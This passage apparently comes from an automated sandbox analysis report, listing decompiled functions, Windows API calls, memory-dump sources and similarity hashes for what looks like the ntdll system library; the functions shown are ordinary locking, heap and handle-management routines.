					E6AB82280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x6ac586ac);
					L6AB6F900(0x6ac586d4, _t28);
					E6AB7FFB0(0x6ac586ac, _t28, 0x6ac586ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E6AB7FFB0(0, _t28, _t32);
					_t18 =  *(_t28 + 0x94);
					if(_t18 != 0) {
						RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t18);
					}
					_t10 = RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t28);
				}
				return _t10;
			}

0x6ac3401a
0x6ac3401e
0x6ac34023
0x6ac34028
0x6ac34029
0x6ac3402b
0x6ac3402f
0x6ac34043
0x6ac34046
0x6ac34051
0x6ac34057
0x6ac3405f
0x6ac34062
0x6ac34067
0x6ac3406f
0x6ac3407c
0x6ac3407c
0x6ac3408c
0x6ac3408c
0x6ac34097

APIs

RtlAcquireSRWLockExclusive.1105(?,?,000000A0,?,?,?,6ABD6D7C,?,?,00000000,?,?,6AB94E1B,0000000F), ref: 6AC3402F
RtlAcquireSRWLockExclusive.1105(6AC586AC,?,?,000000A0,?,?,?,6ABD6D7C,?,?,00000000,?,?,6AB94E1B,0000000F), ref: 6AC34046

Part of subcall function 6AB82280: RtlDllShutdownInProgress.1105(00000000), ref: 6AB822BA
Part of subcall function 6AB82280: ZwWaitForAlertByThreadId.1105(?,00000000,?,?,?,?,?,?,?,00000000), ref: 6AB823A3

RtlRbRemoveNode.1105(6AC586D4,?,6AC586AC,?,?,000000A0,?,?,?,6ABD6D7C,?,?,00000000,?,?,6AB94E1B), ref: 6AC34051
RtlReleaseSRWLockExclusive.1105(6AC586AC,6AC586D4,?,6AC586AC,?,?,000000A0,?,?,?,6ABD6D7C,?,?,00000000,?,?), ref: 6AC34057
RtlReleaseSRWLockExclusive.1105(?,6AC586AC,6AC586D4,?,6AC586AC,?,?,000000A0,?,?,?,6ABD6D7C,?,?,00000000,?), ref: 6AC34062
RtlFreeHeap.1105(?,00000000,?,?,6AC586AC,6AC586D4,?,6AC586AC,?,?,000000A0,?,?,?,6ABD6D7C,?), ref: 6AC3407C
RtlFreeHeap.1105(?,00000000,?,?,6AC586AC,6AC586D4,?,6AC586AC,?,?,000000A0,?,?,?,6ABD6D7C,?), ref: 6AC3408C

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$AcquireFreeHeapRelease$AlertNodeProgressRemoveShutdownThreadWait
String ID:
API String ID: 83280457-0
Opcode ID: c0292ea6c348cdaead8249c249982ac5b4fa2f1b6c360fb67bad988a397e8d83
Instruction ID: d37b6d80bd500863d897454b2a11f27b4e812a6646a3ebf4ee15ca25428f86d6
Opcode Fuzzy Hash: c0292ea6c348cdaead8249c249982ac5b4fa2f1b6c360fb67bad988a397e8d83
Instruction Fuzzy Hash: 9201D4B1302584BFC3109F79CD84E1BB7ACEF45668B010225F11887A12DF24EC11D7E4

Uniqueness

Uniqueness Score: -1.00%

Function 6ABFFF10, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44timeCOMMON

Download Yara Rule

APIs

DbgPrintEx.1105(00000065,00000000,NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p,?,000000FF,?,6AC409B0,00000014,6AB7EBD8,?,?,?,00000000,?,6AB61E03,?), ref: 6ABFFF69
RtlDecodePointer.1105(6AC409B0,00000014,6AB7EBD8,?,?,?,00000000,?,6AB61E03,?,6AB61D6E,?), ref: 6ABFFF78
RtlRaiseStatus.1105(C0000264,6AC409B0,00000014,6AB7EBD8,?,?,?,00000000,?,6AB61E03,?,6AB61D6E,?), ref: 6ABFFF89
RtlDebugPrintTimes.1105(?,C0000264,6AC409B0,00000014,6AB7EBD8,?,?,?,00000000,?,6AB61E03,?,6AB61D6E,?), ref: 6ABFFF9A
RtlpNotOwnerCriticalSection.1105 ref: 6ABFFFB1

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 6ABFFF60

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Print$CriticalDebugDecodeOwnerPointerRaiseRtlpSectionStatusTimes
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 2675442896-1911121157
Opcode ID: cb13b690f7e25992d385ffb3c2a63ae9befb05beb62a53756f82b80f27077fc6
Instruction ID: 0f0675f5ca8087569def8e6c2f65bec779050dfe431d40336af8eaed812e5d25
Opcode Fuzzy Hash: cb13b690f7e25992d385ffb3c2a63ae9befb05beb62a53756f82b80f27077fc6
Instruction Fuzzy Hash: C311A171912184EFDB01CB60C948F9CBBB1FF05718F168454F108A71A2CF399955EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6AB65AC0, Relevance: 9.2, APIs: 6, Instructions: 222COMMON

Download Yara Rule

APIs

memcpy.1105(?,?,00000200,?,000001FF,?,?,?,?), ref: 6AB65BE1

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 0d38b8051ecab9afeb524aba87f2e7a40f5a414d6ef72528ca1abd5c51bf9e1a
Instruction ID: d417546f802cb5730e474c9a550ac882b60e69aae483a9149c36316eba2d8501
Opcode Fuzzy Hash: 0d38b8051ecab9afeb524aba87f2e7a40f5a414d6ef72528ca1abd5c51bf9e1a
Instruction Fuzzy Hash: 6381C4B1A001999BDB20CE28DD40BDA73B8EF44314F0541A9DA15E7282FF74DDC1ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 6AB6B171, Relevance: 9.2, APIs: 6, Instructions: 166nativeCOMMON

Download Yara Rule

APIs

ZwQueryDebugFilterState.1105(?,6ABAB627,6AC3F7A8,00000090,6AB6B16E,00000003,6ABAB627,0000000A,00000001,00000000,0000000A,6ABAB627,Invalid parameter passed to C runtime function.), ref: 6AB6B1C4
_alloca_probe_16.1105(6AC3F7A8,00000090,6AB6B16E,00000003,6ABAB627,0000000A,00000001,00000000,0000000A,6ABAB627,Invalid parameter passed to C runtime function.), ref: 6ABC4835
memcpy.1105(?,?,?,6AC3F7A8,00000090,6AB6B16E,00000003,6ABAB627,0000000A,00000001,00000000,0000000A,6ABAB627), ref: 6ABC4866
_vsnprintf.1105(?,-00000081,?,?,0000000A,6ABAB627), ref: 6ABC48AD
ZwWow64DebuggerCall.1105(00000001,00000000,7FFE02D4,?,6ABAB627,6AC3F7A8,00000090,6AB6B16E,00000003,6ABAB627,0000000A,00000001,00000000,0000000A,6ABAB627,Invalid parameter passed to C runtime function.), ref: 6ABC4986

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CallDebugDebuggerFilterQueryStateWow64_alloca_probe_16_vsnprintfmemcpy
String ID:
API String ID: 1346858437-0
Opcode ID: ccb9a139d9ef643b06c2bcf80b77ab6b810d6b69dca3ad0ea40775198fa8f1d1
Instruction ID: 9c1aac8aa816dd719321b9b134f9c1b96d0a26a0cd7c1870bd3b634df303b9d2
Opcode Fuzzy Hash: ccb9a139d9ef643b06c2bcf80b77ab6b810d6b69dca3ad0ea40775198fa8f1d1
Instruction Fuzzy Hash: 4151F971D052A99FDB20CF64C848BADBBB0FF01314F1141ADD86A97282EB744A45AB92

Uniqueness

Uniqueness Score: -1.00%

Function 6AC3740D, Relevance: 9.1, APIs: 6, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

RtlCompareMemory.1105(00000018,?,00000000,00000000,00000000,00000000,00000000,00000000,?,6ABE14C4,0000000C,?,?,00000000,00000066,00000000), ref: 6AC3743C
RtlAllocateHeap.1105(?,00000008,0000001A,00000000,00000000,00000000,00000000,00000000,?,6ABE14C4,0000000C,?,?,00000000,00000066,00000000), ref: 6AC37464
memcpy.1105(00000018,?,00000000,?,00000008,0000001A,00000000,00000000,00000000,00000000,00000000,?,6ABE14C4,0000000C,?,?), ref: 6AC37484
RtlAllocateHeap.1105(?,00000008,00000018,00000000,00000066,00000000), ref: 6AC374AC
memcmp.1105(00000066,00000008,00000010,00000018,?,00000000,00000000,00000000,00000000,00000000,00000000,?,6ABE14C4,0000000C,?,?), ref: 6AC37527
RtlAllocateHeap.1105(?,00000008,00000018,00000000,00000066,00000000), ref: 6AC37546

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap$CompareMemorymemcmpmemcpy
String ID:
API String ID: 3500240269-0
Opcode ID: baa7240570a5d7fc6d054c2d00f7bf646e299105df396f1fb5165abb431b6e27
Instruction ID: 5310a346b134f2e7c5ace23a775d5c3ec89ef5e350b9126c2185e954572e9251
Opcode Fuzzy Hash: baa7240570a5d7fc6d054c2d00f7bf646e299105df396f1fb5165abb431b6e27
Instruction Fuzzy Hash: D8517B71641606EFDB19CF58C880A86BBF5FF45304F15C1AAE9089F212EB71E946DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6AB919B8, Relevance: 9.1, APIs: 6, Instructions: 127nativeCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.1105(6AC57B60,?,00000000,?,00000000,?,6AB708B8,?,?,?,?,?,?,6ABC0AF4,?), ref: 6AB919DE
RtlLeaveCriticalSection.1105(6AC57B60,6AC57B60,?,00000000,?,00000000,?,6AB708B8,?,?,?,?,?,?,6ABC0AF4,?), ref: 6AB91A38
RtlEnterCriticalSection.1105(6AC57B60,6AC57B60,6AB708B8,?,?,?,?,?,?,6ABC0AF4,?), ref: 6AB91A74
RtlLeaveCriticalSection.1105(6AC57B60,6AC57B60,6AC57B60,6AB708B8,?,?,?,?,?,?,6ABC0AF4,?), ref: 6AB91AB9
ZwWaitForSingleObject.1105(?,00000000,00000000,6AC57B60,6AC57B60,?,00000000,?,00000000,?,6AB708B8,?,?,?,?,?), ref: 6AB91ADF
RtlQueryInformationActivationContext.1105(00000001,00000000,00000000,?,?,?,?,?,6AC57B60,?,00000000,?,00000000,?,6AB708B8,?), ref: 6AB91B37

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$ActivationContextInformationObjectQuerySingleWait
String ID:
API String ID: 970085952-0
Opcode ID: 5685fa21fd25ac1decb958ac759bef99b0580ba149df1fc8b5decdf7e1e751b1
Instruction ID: 610fa5c4998b63b43acbe418ec043b9ebbedb5cc85935698a0093a5ebf23a243
Opcode Fuzzy Hash: 5685fa21fd25ac1decb958ac759bef99b0580ba149df1fc8b5decdf7e1e751b1
Instruction Fuzzy Hash: 8F41E5359452809FDBA18F59D810B997BF9EB47320F19C827F91497240EF305CB0BB65

Uniqueness

Uniqueness Score: -1.00%

Function 6AB70100, Relevance: 9.1, APIs: 6, Instructions: 122nativeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.1105(6AC5861C,6AC3F848,0000001C,6AB6F66C,?,00000000,6AC552D8), ref: 6AB70120
ZwUnmapViewOfSection.1105(000000FF,?,6AC5861C,6AC3F848,0000001C,6AB6F66C,?,00000000,6AC552D8), ref: 6AB701AF
ZwClose.1105(?,000000FF,?,6AC5861C,6AC3F848,0000001C,6AB6F66C,?,00000000,6AC552D8), ref: 6AB701BD

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: AcquireCloseExclusiveLockSectionUnmapView
String ID:
API String ID: 1629747488-0
Opcode ID: df987954682ee9a74bb8a2818acc83a7e0cba6af6982fbaf83b44a58c26471cb
Instruction ID: 05669ddee94a76a6fe23bc081a14a0d086b402e3566a8ce5973429eab00eb25f
Opcode Fuzzy Hash: df987954682ee9a74bb8a2818acc83a7e0cba6af6982fbaf83b44a58c26471cb
Instruction Fuzzy Hash: 2541BB31945684DFCF60CF68C890BAE77B0FF06715F061516E421AB292EBB6C950FBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ABE5623, Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105(00000000,00000002,?,6ABDE4BC,6AC403D0,0000000C,6ABD9687,00000000,00000000,00000001,?,?,7FFE0386,?,6AB66778,00000001), ref: 6ABE5628
RtlGetCurrentServiceSessionId.1105 ref: 6ABE5661
RtlTryEnterCriticalSection.1105(6AC55350,00000000,00000002,?,6ABDE4BC,6AC403D0,0000000C,6ABD9687,00000000,00000000,00000001,?,?,7FFE0386,?,6AB66778), ref: 6ABE569B
RtlGetCurrentServiceSessionId.1105(6AC55350,00000000,00000002,?,6ABDE4BC,6AC403D0,0000000C,6ABD9687,00000000,00000000,00000001,?,?,7FFE0386,?,6AB66778), ref: 6ABE56A2
RtlGetCurrentServiceSessionId.1105 ref: 6ABE56D2
RtlGetCurrentServiceSessionId.1105 ref: 6ABE572F

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentServiceSession$CriticalEnterSection
String ID:
API String ID: 1555030633-0
Opcode ID: 4f2be1583cd5becbd56479fbfbf95421e6e53bea31fa7476a16ce99d740ee746
Instruction ID: 7f5af8d84037a7fea1a809387d3e4be51e344da4abc13e3bc8042c925187692c
Opcode Fuzzy Hash: 4f2be1583cd5becbd56479fbfbf95421e6e53bea31fa7476a16ce99d740ee746
Instruction Fuzzy Hash: 6E3164717466C1DFE7228768CE58B143794FF027A4F2603A0E9309B6E7DFA8D451E218

Uniqueness

Uniqueness Score: -1.00%

Function 6AC13D40, Relevance: 9.1, APIs: 6, Instructions: 98memorytimeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.1105(6AC58A6C,?,00000000,00000000,?,?,?,?,?,?,6AC13CAA,00000000,00008000,?), ref: 6AC13D7A
RtlReleaseSRWLockExclusive.1105(6AC58A6C,6AC58A6C,?,00000000,00000000,?,?,?,?,?,?,6AC13CAA,00000000,00008000,?), ref: 6AC13DA1
RtlDebugPrintTimes.1105(?,?,6AC58A6C,6AC58A6C,?,00000000,00000000,?,?,?,?,?,?,6AC13CAA,00000000,00008000), ref: 6AC13DB0
RtlAcquireSRWLockExclusive.1105(6AC58A6C,?,?,?,?,?,?,6AC13CAA,00000000,00008000,?), ref: 6AC13DC6
RtlReleaseSRWLockExclusive.1105(6AC58A6C,6AC58A6C,?,00000000,00000000,?,?,?,?,?,?,6AC13CAA,00000000,00008000,?), ref: 6AC13E1A
RtlFreeHeap.1105(?,00000000,6AC58A6C,6AC58A6C,6AC58A6C,6AC58A6C,?,00000000,00000000,?,?,?,?,?,?,6AC13CAA), ref: 6AC13E4E

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$AcquireRelease$DebugFreeHeapPrintTimes
String ID:
API String ID: 1017367878-0
Opcode ID: 0b71378bfad7aa074ecbed7431cd7a9ffe939ea38e5803ba88efbcc7423fdf9d
Instruction ID: 3c53c2f4abb4bb3338f502fd57af309d10014affe3df42690b7a2e745af3fd9a
Opcode Fuzzy Hash: 0b71378bfad7aa074ecbed7431cd7a9ffe939ea38e5803ba88efbcc7423fdf9d
Instruction Fuzzy Hash: 323135B5609342DFC740CF28C58490ABBF1FF86218F05496EF4A89B241EB30DD24DB96

Uniqueness

Uniqueness Score: -1.00%

Function 6AC2A189, Relevance: 9.1, APIs: 6, Instructions: 96nativeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.1105(6AC56220,00000000,?,?,?), ref: 6AC2A1AE
ZwGetNlsSectionPtr.1105(0000000C,?,00000000,?,?,6AC56220,00000000,?,?,?), ref: 6AC2A1E8
RtlReleaseSRWLockExclusive.1105(6AC56220,?,00000000,00000000,?,0000000C,?,00000000,00000050,6AC56220,00000000,?,?,?), ref: 6AC2A252

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$AcquireReleaseSection
String ID:
API String ID: 1496884002-0
Opcode ID: e195e6ccd36be22eeb88664354d97902c2a7a20f37f7fe13c01460db009f6f31
Instruction ID: 1c1ea31bda3bb77c7fc89520ec796c7c7863abafddae763a70326b389d1a316d
Opcode Fuzzy Hash: e195e6ccd36be22eeb88664354d97902c2a7a20f37f7fe13c01460db009f6f31
Instruction Fuzzy Hash: FB31EE75A04605EBE7218BA9C840B6EBBB8EF85724F110069F519EB241FFB0DD008B90

Uniqueness

Uniqueness Score: -1.00%

Function 6AB6F7C0, Relevance: 9.1, APIs: 6, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.1105(?,?,00000000,00000000,?,6ABE3777,00000000,00000000,00000000,?,?,6AB4C2A8,00000001,?), ref: 6AB6F7F5
RtlReleaseSRWLockExclusive.1105(?,?,?,00000000,00000000,?,6ABE3777,00000000,00000000,00000000,?,?,6AB4C2A8,00000001,?), ref: 6AB6F860

Part of subcall function 6AB6F8C8: RtlAcquireSRWLockExclusive.1105(6AC586AC,?,00000000,?,6AB6F813,?,?,00000000,00000000,?,6ABE3777,00000000,00000000,00000000,?,?), ref: 6AB6F8D5
Part of subcall function 6AB6F8C8: RtlRbRemoveNode.1105(6AC586DC,?,6AC586AC,?,00000000,?,6AB6F813,?,?,00000000,00000000,?,6ABE3777,00000000,00000000,00000000), ref: 6AB6F8E0
Part of subcall function 6AB6F8C8: RtlReleaseSRWLockExclusive.1105(6AC586AC,6AC586DC,?,6AC586AC,?,00000000,?,6AB6F813,?,?,00000000,00000000,?,6ABE3777,00000000,00000000), ref: 6AB6F8EE

RtlReleaseSRWLockExclusive.1105(?,?,?,00000000,00000000,?,6ABE3777,00000000,00000000,00000000,?,?,6AB4C2A8,00000001,?), ref: 6AB6F814
ZwClose.1105(?,?,?,?,00000000,00000000,?,6ABE3777,00000000,00000000,00000000,?,?,6AB4C2A8,00000001,?), ref: 6AB6F82E
RtlSetLastWin32Error.1105(00000006,?,00000000,00000000,?,6ABE3777,00000000,00000000,00000000,?,?,6AB4C2A8,00000001,?), ref: 6AB6F867

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$Release$Acquire$CloseErrorLastNodeRemoveWin32
String ID:
API String ID: 2169420607-0
Opcode ID: f9adce74fdb7c05824f27fe98fcc98fc112ed6f670a1aa5e255c984e3453eaaa
Instruction ID: ea0e79a3a139cff43bc76b45aa68f4477b532f8e994acc9d9753e653f6d43197
Opcode Fuzzy Hash: f9adce74fdb7c05824f27fe98fcc98fc112ed6f670a1aa5e255c984e3453eaaa
Instruction Fuzzy Hash: AD11E236206281E7DB509F74C8C0FAA3B75EF81B14F4920B9ED154F146DF20D881A7A4

Uniqueness

Uniqueness Score: -1.00%

Function 6ABFC450, Relevance: 9.1, APIs: 6, Instructions: 53nativememorythreadCOMMON

Download Yara Rule

APIs

ZwAdjustPrivilegesToken.1105(00000000,00000000,?,00000000,00000000,00000000,?,00000000,00800000,?,6ABC9A59,?,?,000000FF,00000018,00000000), ref: 6ABFC471
ZwSetInformationThread.1105(000000FE,00000005,00000004,00000004,?,00000000,00800000,?,6ABC9A59,?,?,000000FF,00000018,00000000,00000000,00000000), ref: 6ABFC488
ZwClose.1105(00000004,000000FE,00000005,00000004,00000004,?,00000000,00800000,?,6ABC9A59,?,?,000000FF,00000018,00000000,00000000), ref: 6ABFC493
RtlFreeHeap.1105(?,00000000,?,?,00000000,00800000,?,6ABC9A59,?,?,000000FF,00000018,00000000,00000000,00000000,00000000), ref: 6ABFC4AD
ZwClose.1105(00000000,?,00000000,00800000,?,6ABC9A59,?,?,000000FF,00000018,00000000,00000000,00000000,00000000,00000001,00800000), ref: 6ABFC4B4
RtlFreeHeap.1105(?,00000000,00000000,00000000,?,00000000,00800000,?,6ABC9A59,?,?,000000FF,00000018,00000000,00000000,00000000), ref: 6ABFC4C4

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFreeHeap$AdjustInformationPrivilegesThreadToken
String ID:
API String ID: 2345910567-0
Opcode ID: cb7d4b5cc4fed82b388a5ceaa9f75f3cea1cf4035457c2075ca64b83e3d10f5c
Instruction ID: 391242cbf81ca2a367f0373b393ee6923fe3065dcc5ecc628e1dbd37111bce7d
Opcode Fuzzy Hash: cb7d4b5cc4fed82b388a5ceaa9f75f3cea1cf4035457c2075ca64b83e3d10f5c
Instruction Fuzzy Hash: E0012E72280A85BFE7119F24CC80E66F76DFF40398F028425F22042561CF22ACA1EAA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ABF1242, Relevance: 9.0, APIs: 6, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

ZwUnmapViewOfSection.1105(000000FF,?,6ABF122C,6AC407D0,00000058,6ABF0C91,?,00000000,?,00000000,?,?,?,6AC1B56B,00000000,?), ref: 6ABF124C
ZwClose.1105(?,000000FF,?,6ABF122C,6AC407D0,00000058,6ABF0C91,?,00000000,?,00000000,?,?,?,6AC1B56B,00000000), ref: 6ABF125A
ZwClose.1105(?,000000FF,?,6ABF122C,6AC407D0,00000058,6ABF0C91,?,00000000,?,00000000,?,?,?,6AC1B56B,00000000), ref: 6ABF1267
ZwClose.1105(?,6ABF122C,6AC407D0,00000058,6ABF0C91,?,00000000,?,00000000,?,?,?,6AC1B56B,00000000,?,00000000), ref: 6ABF1275
ZwClose.1105(?,6ABF122C,6AC407D0,00000058,6ABF0C91,?,00000000,?,00000000,?,?,?,6AC1B56B,00000000,?,00000000), ref: 6ABF1286
ZwClose.1105(?,6ABF122C,6AC407D0,00000058,6ABF0C91,?,00000000,?,00000000,?,?,?,6AC1B56B,00000000,?,00000000), ref: 6ABF1297

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$SectionUnmapView
String ID:
API String ID: 682624529-0
Opcode ID: df9b40cab72dcffc0bbba800b8aff6860ab2831aacd6ae3e33e08911f29cf166
Instruction ID: da9b2069384ace58a04c283f841cfd363de59890e5a54d589631ff90d4656c0c
Opcode Fuzzy Hash: df9b40cab72dcffc0bbba800b8aff6860ab2831aacd6ae3e33e08911f29cf166
Instruction Fuzzy Hash: C5F0A9B0D0628CAADF059FF0E88979DBA71EF10719F1A0929E221611A2DF714895FB60

Uniqueness

Uniqueness Score: -1.00%

Function 6AB90548, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.1105(6AC57B60,?,00000000,01000000,?,6AB90408,?,00000000,00000024), ref: 6AB90576
RtlLeaveCriticalSection.1105(6AC57B60,6AC58544,?,00000001,?,?,?,?,?,6AC57B60,?,00000000,01000000), ref: 6AB9059F
RtlRbInsertNodeEx.1105(6AC58544,?,00000001,?,?,?,?,?,6AC57B60,?,00000000,01000000), ref: 6AB905F6

Strings

`, xrefs: 6ABD4EB2

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterInsertLeaveNode
String ID: `
API String ID: 1141981990-2679148245
Opcode ID: 68726ac47df3ed2c46b89fb3879494447e5832cf496bf020316ab54b9112464c
Instruction ID: b0fe01c38fd67a46ef928ffe6583a5bbaedb53ad6d2fc2ad3f25e96ec17f80d4
Opcode Fuzzy Hash: 68726ac47df3ed2c46b89fb3879494447e5832cf496bf020316ab54b9112464c
Instruction Fuzzy Hash: 1A512931A44295ABEB119A6D8C40B5BBFB5EF83314F160179E954EB241EFB0D910F7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6AB64439, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 124COMMON

Download Yara Rule

Strings

0, xrefs: 6AB644A3
Flst, xrefs: 6AB64476

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: c84c421984ed69f76353bc1cba507ea97173edbf0c8740374001e59a50977ae4
Instruction ID: 97e0b599080e8062fce12ba517369c3b1f3d6b325c20e64a2411c28f0d857180
